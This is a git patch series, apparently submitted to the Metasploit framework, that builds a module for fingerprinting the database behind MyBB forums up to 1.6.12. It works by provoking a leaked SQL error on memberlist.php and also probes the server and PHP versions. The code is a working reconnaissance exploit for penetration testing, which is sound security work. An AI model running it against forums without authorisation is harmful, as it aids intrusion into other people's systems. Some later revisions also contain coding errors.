From f9f2c401ca141216094be295ed52bf0986ce20b6 Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Fri, 14 Feb 2014 13:12:43 -0800 Subject: [PATCH 01/16] Create myBB_GetTypeDB This exploit allows you to specify the type of database forum Mybb. Works by the operator wrongly used REGEXP. Which is not supported in postgreSQL and SQLite databases. --- modules/exploits/multi/http/myBB_GetTypeDB | 118 +++++++++++++++++++++ 1 file changed, 118 insertions(+) create mode 100644 modules/exploits/multi/http/myBB_GetTypeDB diff --git a/modules/exploits/multi/http/myBB_GetTypeDB b/modules/exploits/multi/http/myBB_GetTypeDB new file mode 100644 index 0000000000..a39fd38c09 --- /dev/null +++ b/modules/exploits/multi/http/myBB_GetTypeDB @@ -0,0 +1,118 @@ +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'MyBB type database extractor', + 'Description' => %q{ + This module exploits vulnerability in MyBB. + Provide type of database in forum + This affects versions <= 1.6.12 + }, + 'Author' => + [ + 'Arthur Karmanovskii', # Discovery + 'http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812' # Metasploit Module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ '0 - days', '2014-13-02' ] + ], + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'Automatic', { } ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 13 2014')) + + register_options( + [ + OptString.new('TARGETURI', [ true, "MyBB forum directory path", 'http://localhost/forum']) + ], self.class) + end + + def check + begin + print_status("URI: #{datastore['TARGETURI']}") + uri = normalize_uri(target_uri.path, '/index.php') + res = send_request_raw( + { + 'method' => 'GET', + 'uri' => uri, + 'headers' => + { + 'Accept' => 'text/html, application/xhtml+xml, */*', + 'Accept-Language' => 'ru-RU', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'Keep-Alive', + 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + } + }, 25) + rescue + print_error("Unable to connect to server.") + return CheckCode::Unknown + end + + if res.code != 200 + print_error("Unable to query to host") + return CheckCode::Unknown + end + + php_version = res['X-Powered-By'] + if php_version + print_good("PHP Version: #{php_version}") + else + print_status("Unknown PHP Version") + return CheckCode::Unknown + end + + _Version_server = res['Server'] + if _Version_server + print_good("Server Version: #{_Version_server}") + else + print_status("Unknown Server Version") + return CheckCode::Unknown + end + return CheckCode::Detected + end + + def exploit + uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') + response = send_request_raw( + { + 'method' => 'GET', + 'uri' => uri, + 'headers' => + { + 'Accept' => 'text/html, application/xhtml+xml, */*', + 'Accept-Language' => 'ru-RU', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'Close', + 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + } + }, 25) + if response.nil? + fail_with(Failure::NotFound, "Failed to retrieve webpage.") + end + #Resolve response + if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/) + print_good("Database is: PostgreSQL ;)") + elsif response.body.match(/General error\: 1 no such function\: REGEXP/) + print_good("Database is: SQLite ;)") + else response.body.match(/Member List/) + print_status("Database MySQL or this is not forum MyBB or unknown Database") + end + + end +end + From 81e89eadba0830ba1b88667ccbda6b2f7d725c5e Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Wed, 19 Feb 2014 10:21:05 -0800 Subject: [PATCH 02/16] Rename modules/exploits/multi/http/myBB_GetTypeDB to modules/auxiliary/analyse/myBB_GetTypeDB.rb On the advice of "wvu-r7" moved module. --- .../http/myBB_GetTypeDB => auxiliary/analyse/myBB_GetTypeDB.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/{exploits/multi/http/myBB_GetTypeDB => auxiliary/analyse/myBB_GetTypeDB.rb} (100%) diff --git a/modules/exploits/multi/http/myBB_GetTypeDB b/modules/auxiliary/analyse/myBB_GetTypeDB.rb similarity index 100% rename from modules/exploits/multi/http/myBB_GetTypeDB rename to modules/auxiliary/analyse/myBB_GetTypeDB.rb From 396ff8adaaa71eddde168f784fe851e0089190dc Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Wed, 19 Feb 2014 11:33:57 -0800 Subject: [PATCH 03/16] Rename modules/auxiliary/analyse/myBB_GetTypeDB.rb to modules/auxiliary/analyze/myBB_GetTypeDB.rb Sorry again :( --- modules/auxiliary/{analyse => analyze}/myBB_GetTypeDB.rb | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/{analyse => analyze}/myBB_GetTypeDB.rb (100%) diff --git a/modules/auxiliary/analyse/myBB_GetTypeDB.rb b/modules/auxiliary/analyze/myBB_GetTypeDB.rb similarity index 100% rename from modules/auxiliary/analyse/myBB_GetTypeDB.rb rename to modules/auxiliary/analyze/myBB_GetTypeDB.rb From 162527c0e4d82cfcd926fdd696575f37d47d487d Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Thu, 6 Mar 2014 09:43:23 -0800 Subject: [PATCH 04/16] Update and rename modules/auxiliary/analyze/myBB_GetTypeDB.rb to modules/auxiliary/gather/myBB_GetTypeDB.rb Minor changes and bug: "Msf :: Auxiliary" - forgot to change --- .../{analyze => gather}/myBB_GetTypeDB.rb | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) rename modules/auxiliary/{analyze => gather}/myBB_GetTypeDB.rb (92%) diff --git a/modules/auxiliary/analyze/myBB_GetTypeDB.rb b/modules/auxiliary/gather/myBB_GetTypeDB.rb similarity index 92% rename from modules/auxiliary/analyze/myBB_GetTypeDB.rb rename to modules/auxiliary/gather/myBB_GetTypeDB.rb index a39fd38c09..5b14a969c7 100644 --- a/modules/auxiliary/analyze/myBB_GetTypeDB.rb +++ b/modules/auxiliary/gather/myBB_GetTypeDB.rb @@ -1,6 +1,6 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit3 < Msf::Auxiliary Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -59,12 +59,12 @@ class Metasploit3 < Msf::Exploit::Remote }, 25) rescue print_error("Unable to connect to server.") - return CheckCode::Unknown + return Exploit::CheckCode::Unknown end if res.code != 200 print_error("Unable to query to host") - return CheckCode::Unknown + return Exploit::CheckCode::Unknown end php_version = res['X-Powered-By'] @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote print_good("PHP Version: #{php_version}") else print_status("Unknown PHP Version") - return CheckCode::Unknown + return Exploit::CheckCode::Unknown end _Version_server = res['Server'] @@ -80,12 +80,12 @@ class Metasploit3 < Msf::Exploit::Remote print_good("Server Version: #{_Version_server}") else print_status("Unknown Server Version") - return CheckCode::Unknown + return Exploit::CheckCode::Unknown end - return CheckCode::Detected + return Exploit::CheckCode::Detected end - def exploit + def run uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') response = send_request_raw( { @@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote print_good("Database is: PostgreSQL ;)") elsif response.body.match(/General error\: 1 no such function\: REGEXP/) print_good("Database is: SQLite ;)") - else response.body.match(/Member List/) + else print_status("Database MySQL or this is not forum MyBB or unknown Database") end From 6d748f49d31c7524511d6501c6490236b33b812f Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Fri, 7 Mar 2014 10:49:30 -0800 Subject: [PATCH 05/16] Update myBB_GetTypeDB.rb MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 1.I added comment header; 2.I made ​​a link to your account as a comment; 3.I added a link https://github.com/rapid7/metasploit-framework/pull/3070 Items 2 and 3 on the advice wchen-r7 --- modules/auxiliary/gather/myBB_GetTypeDB.rb | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/gather/myBB_GetTypeDB.rb b/modules/auxiliary/gather/myBB_GetTypeDB.rb index 5b14a969c7..9106a4f746 100644 --- a/modules/auxiliary/gather/myBB_GetTypeDB.rb +++ b/modules/auxiliary/gather/myBB_GetTypeDB.rb @@ -1,3 +1,8 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + require 'msf/core' class Metasploit3 < Msf::Auxiliary @@ -15,13 +20,13 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ - 'Arthur Karmanovskii', # Discovery - 'http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812' # Metasploit Module + # http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 + 'Arthur Karmanovskii ' # Discovery and Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ - [ '0 - days', '2014-13-02' ] + [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/3070' ] ], 'Privileged' => false, 'Platform' => ['php'], @@ -115,4 +120,3 @@ class Metasploit3 < Msf::Auxiliary end end - From 0b51e7459c2e1730fb3c63cf16f8530a7f751bf8 Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Mon, 24 Mar 2014 12:19:51 -0700 Subject: [PATCH 06/16] Update myBB_GetTypeDB.rb I have added detection MyBB forum. --- modules/auxiliary/gather/myBB_GetTypeDB.rb | 95 ++++++++++++---------- 1 file changed, 53 insertions(+), 42 deletions(-) diff --git a/modules/auxiliary/gather/myBB_GetTypeDB.rb b/modules/auxiliary/gather/myBB_GetTypeDB.rb index 9106a4f746..46e0a0ad9a 100644 --- a/modules/auxiliary/gather/myBB_GetTypeDB.rb +++ b/modules/auxiliary/gather/myBB_GetTypeDB.rb @@ -4,7 +4,6 @@ ## require 'msf/core' - class Metasploit3 < Msf::Auxiliary Rank = ExcellentRanking @@ -46,49 +45,61 @@ class Metasploit3 < Msf::Auxiliary def check begin - print_status("URI: #{datastore['TARGETURI']}") - uri = normalize_uri(target_uri.path, '/index.php') - res = send_request_raw( - { - 'method' => 'GET', - 'uri' => uri, - 'headers' => - { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Keep-Alive', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" - } - }, 25) - rescue - print_error("Unable to connect to server.") - return Exploit::CheckCode::Unknown - end - - if res.code != 200 - print_error("Unable to query to host") - return Exploit::CheckCode::Unknown - end - - php_version = res['X-Powered-By'] - if php_version - print_good("PHP Version: #{php_version}") - else - print_status("Unknown PHP Version") - return Exploit::CheckCode::Unknown - end - _Version_server = res['Server'] - if _Version_server - print_good("Server Version: #{_Version_server}") - else - print_status("Unknown Server Version") - return Exploit::CheckCode::Unknown - end - return Exploit::CheckCode::Detected + uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') + nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], + { + 'Msf' => framework, + 'MsfExploit' => self, + }) + req = nclient.request_raw({ + 'uri' => uri, + 'method' => 'GET',}) + if (req) + res = nclient.send_recv(req, 1024) + else + print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") + return Exploit::CheckCode::Unknown + end + if res.code != 200 + print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") + return Exploit::CheckCode::Unknown + end + + #Check PhP + php_version = res['X-Powered-By'] + if php_version + php_version = " PHP Version: #{php_version}".ljust(40) + else + php_version = " PHP Version: unknown".ljust(40) + #return Exploit::CheckCode::Unknown # necessary ???? + end + + #Check Web-Server + _Version_server = res['Server'] + if _Version_server + _Version_server = " Server Version: #{_Version_server}".ljust(40) + else + _Version_server = " Server Version: unknown".ljust(40) + end + + #Check forum MyBB + if res.body.match("MYBB") + print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Detected + else + print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Unknown + end + rescue RuntimeError => err + print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") + return Exploit::CheckCode::Unknown + end + + end + + def run uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') From b11df0eaf0e095701ba185fc229aaf718b4f02f5 Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Fri, 28 Mar 2014 16:47:49 -0700 Subject: [PATCH 07/16] Update and rename myBB_GetTypeDB.rb to mybb_get_type_db.rb --- modules/auxiliary/gather/myBB_GetTypeDB.rb | 133 ------------------- modules/auxiliary/gather/mybb_get_type_db.rb | 129 ++++++++++++++++++ 2 files changed, 129 insertions(+), 133 deletions(-) delete mode 100644 modules/auxiliary/gather/myBB_GetTypeDB.rb create mode 100644 modules/auxiliary/gather/mybb_get_type_db.rb diff --git a/modules/auxiliary/gather/myBB_GetTypeDB.rb b/modules/auxiliary/gather/myBB_GetTypeDB.rb deleted file mode 100644 index 46e0a0ad9a..0000000000 --- a/modules/auxiliary/gather/myBB_GetTypeDB.rb +++ /dev/null @@ -1,133 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' -class Metasploit3 < Msf::Auxiliary - Rank = ExcellentRanking - - include Msf::Exploit::Remote::HttpClient - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'MyBB type database extractor', - 'Description' => %q{ - This module exploits vulnerability in MyBB. - Provide type of database in forum - This affects versions <= 1.6.12 - }, - 'Author' => - [ - # http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 - 'Arthur Karmanovskii ' # Discovery and Metasploit Module - ], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/3070' ] - ], - 'Privileged' => false, - 'Platform' => ['php'], - 'Arch' => ARCH_PHP, - 'Targets' => - [ - [ 'Automatic', { } ], - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Feb 13 2014')) - - register_options( - [ - OptString.new('TARGETURI', [ true, "MyBB forum directory path", 'http://localhost/forum']) - ], self.class) - end - - def check - begin - - uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') - nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], - { - 'Msf' => framework, - 'MsfExploit' => self, - }) - req = nclient.request_raw({ - 'uri' => uri, - 'method' => 'GET',}) - if (req) - res = nclient.send_recv(req, 1024) - else - print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") - return Exploit::CheckCode::Unknown - end - if res.code != 200 - print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") - return Exploit::CheckCode::Unknown - end - - #Check PhP - php_version = res['X-Powered-By'] - if php_version - php_version = " PHP Version: #{php_version}".ljust(40) - else - php_version = " PHP Version: unknown".ljust(40) - #return Exploit::CheckCode::Unknown # necessary ???? - end - - #Check Web-Server - _Version_server = res['Server'] - if _Version_server - _Version_server = " Server Version: #{_Version_server}".ljust(40) - else - _Version_server = " Server Version: unknown".ljust(40) - end - - #Check forum MyBB - if res.body.match("MYBB") - print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) - return Exploit::CheckCode::Detected - else - print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) - return Exploit::CheckCode::Unknown - end - rescue RuntimeError => err - print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") - return Exploit::CheckCode::Unknown - end - - - end - - - - def run - uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') - response = send_request_raw( - { - 'method' => 'GET', - 'uri' => uri, - 'headers' => - { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Close', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" - } - }, 25) - if response.nil? - fail_with(Failure::NotFound, "Failed to retrieve webpage.") - end - #Resolve response - if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/) - print_good("Database is: PostgreSQL ;)") - elsif response.body.match(/General error\: 1 no such function\: REGEXP/) - print_good("Database is: SQLite ;)") - else - print_status("Database MySQL or this is not forum MyBB or unknown Database") - end - - end -end diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb new file mode 100644 index 0000000000..e20d863f2d --- /dev/null +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -0,0 +1,129 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Determinant Databases MyBB ', + 'Description' => %q{ + Determine the database in the forum. + This affects versions <= 1.6.12 + }, + 'Author' => + [ + #http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 + 'Arthur Karmanovskii '#Discovery and Metasploit Module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/3070' ] + ], + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'Automatic', { } ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 13 2014')) + + register_options( + [ + OptString.new('TARGETURI', [ true, "MyBB forum directory path", '/forum']) + ], self.class) + end + + def check + begin + uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') + nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], + { + 'Msf' => framework, + 'MsfExploit' => self, + }) + req = nclient.request_raw({ + 'uri' => uri, + 'method' => 'GET',}) + if (req) + res = nclient.send_recv(req, 1024) + else + print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") + return Exploit::CheckCode::Unknown + end + if res.code != 200 + print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") + return Exploit::CheckCode::Unknown + end + + #Check PhP + php_version = res['X-Powered-By'] + if php_version + php_version = " PHP Version: #{php_version}".ljust(40) + else + php_version = " PHP Version: unknown".ljust(40) + #return Exploit::CheckCode::Unknown # necessary ???? + end + + #Check Web-Server + _Version_server = res['Server'] + if _Version_server + _Version_server = " Server Version: #{_Version_server}".ljust(40) + else + _Version_server = " Server Version: unknown".ljust(40) + end + + #Check forum MyBB + if res.body.match("MYBB") + print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Detected + else + print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Unknown + end + rescue RuntimeError => err + print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") + return Exploit::CheckCode::Unknown + end + + + end + + + def run + uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') + response = send_request_raw( + { + 'method' => 'GET', + 'uri' => uri, + 'headers' => + { + 'Accept' => 'text/html, application/xhtml+xml, */*', + 'Accept-Language' => 'ru-RU', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'Close', + 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + } + }, 25) + if response.nil? + fail_with(Failure::NotFound, "Failed to retrieve webpage.") + end + + #Resolve response + if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/) + print_good("Database is: PostgreSQL ;)") + elsif response.body.match(/General error\: 1 no such function\: REGEXP/) + print_good("Database is: SQLite ;)") + else + print_status("Database MySQL or this is not forum MyBB or unknown Database") + end + end +end From c035715a711f507b5895f429c60a3a6f7f88fc8c Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Sat, 5 Apr 2014 02:50:53 -0700 Subject: [PATCH 08/16] Update mybb_get_type_db.rb Changed the name of the variable _Version_server on _version_server according to the recommendation of jvazquez-r7 --- modules/auxiliary/gather/mybb_get_type_db.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index e20d863f2d..58d01b6d58 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -73,19 +73,19 @@ class Metasploit3 < Msf::Auxiliary end #Check Web-Server - _Version_server = res['Server'] - if _Version_server - _Version_server = " Server Version: #{_Version_server}".ljust(40) + _version_server = res['Server'] + if _version_server + _version_server = " Server Version: #{_Version_server}".ljust(40) else - _Version_server = " Server Version: unknown".ljust(40) + _version_server = " Server Version: unknown".ljust(40) end #Check forum MyBB if res.body.match("MYBB") - print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_version_server) return Exploit::CheckCode::Detected else - print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_version_server) return Exploit::CheckCode::Unknown end rescue RuntimeError => err From 5dbd124ef9440ae72923fb817d47184b8639c536 Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Sat, 5 Apr 2014 02:53:43 -0700 Subject: [PATCH 09/16] Update mybb_get_type_db.rb --- modules/auxiliary/gather/mybb_get_type_db.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index 58d01b6d58..ad1e413cab 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary #Check Web-Server _version_server = res['Server'] if _version_server - _version_server = " Server Version: #{_Version_server}".ljust(40) + _version_server = " Server Version: #{_version_server}".ljust(40) else _version_server = " Server Version: unknown".ljust(40) end From cbb84e854ca35f66b5b199a63fdedfc52b1d4e9d Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Wed, 14 May 2014 14:56:40 +0400 Subject: [PATCH 10/16] Update mybb_get_type_db.rb 14.05.2014 Eliminated notes jvazquez-r7 --- modules/auxiliary/gather/mybb_get_type_db.rb | 143 +++++++++---------- 1 file changed, 69 insertions(+), 74 deletions(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index ad1e413cab..a61c1166d1 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -12,27 +12,19 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'Determinant Databases MyBB ', 'Description' => %q{ - Determine the database in the forum. - This affects versions <= 1.6.12 + Determine the database in the forum. + This affects versions <= 1.6.12 }, 'Author' => [ - #http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 - 'Arthur Karmanovskii '#Discovery and Metasploit Module + #http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 + 'Arthur Karmanovskii '#Discovery and Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/3070' ] ], - 'Privileged' => false, - 'Platform' => ['php'], - 'Arch' => ARCH_PHP, - 'Targets' => - [ - [ 'Automatic', { } ], - ], - 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 13 2014')) register_options( @@ -43,78 +35,81 @@ class Metasploit3 < Msf::Auxiliary def check begin - uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') - nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], - { - 'Msf' => framework, - 'MsfExploit' => self, - }) - req = nclient.request_raw({ - 'uri' => uri, - 'method' => 'GET',}) - if (req) - res = nclient.send_recv(req, 1024) - else - print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") - return Exploit::CheckCode::Unknown - end - if res.code != 200 - print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") - return Exploit::CheckCode::Unknown - end + uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') + nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], + { + 'Msf' => framework, + 'MsfExploit' => self, + }) + req = nclient.request_cgi({ + 'uri' => uri, + 'method' => 'GET',}) + if req.nil? + print_error("Failed to retrieve webpage.") + return Exploit::CheckCode::Unknown + end + if req + res = nclient.send_recv(req, 1024) + else + print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") + return Exploit::CheckCode::Unknown + end + if res.code != 200 + print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") + return Exploit::CheckCode::Unknown + end - #Check PhP - php_version = res['X-Powered-By'] - if php_version - php_version = " PHP Version: #{php_version}".ljust(40) - else - php_version = " PHP Version: unknown".ljust(40) - #return Exploit::CheckCode::Unknown # necessary ???? - end + #Check PhP + php_version = res['X-Powered-By'] + if php_version + php_version = " PHP Version: #{php_version}".ljust(40) + else + php_version = " PHP Version: unknown".ljust(40) + #return Exploit::CheckCode::Unknown # necessary ???? + end - #Check Web-Server - _version_server = res['Server'] - if _version_server - _version_server = " Server Version: #{_version_server}".ljust(40) - else - _version_server = " Server Version: unknown".ljust(40) - end - - #Check forum MyBB - if res.body.match("MYBB") - print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_version_server) - return Exploit::CheckCode::Detected - else - print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_version_server) - return Exploit::CheckCode::Unknown - end - rescue RuntimeError => err - print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") - return Exploit::CheckCode::Unknown - end + #Check Web-Server + _Version_server = res['Server'] + if _Version_server + _Version_server = " Server Version: #{_Version_server}".ljust(40) + else + _Version_server = " Server Version: unknown".ljust(40) + end + #Check forum MyBB + if res.body.match("MYBB") + print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Detected + else + print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Unknown + end + rescue RuntimeError => err + print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") + return Exploit::CheckCode::Unknown + end end def run uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') - response = send_request_raw( - { - 'method' => 'GET', - 'uri' => uri, - 'headers' => - { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Close', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" - } - }, 25) + response = send_request_cgi( + { + 'method' => 'GET', + 'uri' => uri, + 'vars_get' => { + 'Accept' => 'text/html, application/xhtml+xml, */*', + 'Accept-Language' => 'ru-RU', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'Close', + 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + } + }) if response.nil? - fail_with(Failure::NotFound, "Failed to retrieve webpage.") + print_error("Failed to retrieve webpage.") + return end #Resolve response From 06912ac2b6180258b0ef8ead30eedfd15795bc27 Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Sat, 17 May 2014 16:30:29 +0400 Subject: [PATCH 11/16] Update mybb_get_type_db.rb 1.Changed "Rex::Proto::Http::Client" to "Msf::Exploit::Remote::HttpClient" 2.changed the name of the variable "_Version_server". --- 